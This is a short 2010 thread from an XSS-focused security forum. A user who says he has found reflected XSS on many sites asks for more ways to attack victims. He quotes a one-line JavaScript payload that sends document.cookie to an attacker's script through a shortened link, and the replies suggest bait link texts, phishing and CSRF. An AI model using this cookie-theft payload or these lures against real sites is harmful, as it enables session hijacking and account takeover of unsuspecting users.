Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
XSS new techniques for non persistent?
Posted by: ejoker
Date: January 04, 2010 10:35AM

i found most of site with non persistent XSS vulnerability.
i seen only one way to damage from this xss
like this ...& send to victim with short url
document.location='http://site.com/script.php?'+document.cookie.

techno xperts what are other ways to attack?
plz xplain with example or refer some documents or site.
thank you

Options: ReplyQuote
Re: XSS new techniques for non persistent?
Posted by: PaPPy
Date: January 04, 2010 08:14PM

i feel like this has been asked before...

but how about a link saying:
Free porn!

or
This site has been hacked look here!

or
free xbox 360!

just an idea

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: XSS new techniques for non persistent?
Posted by: Kyo
Date: January 09, 2010 09:50AM

phishing, CSRF

Options: ReplyQuote


Sorry, only registered users may post in this forum.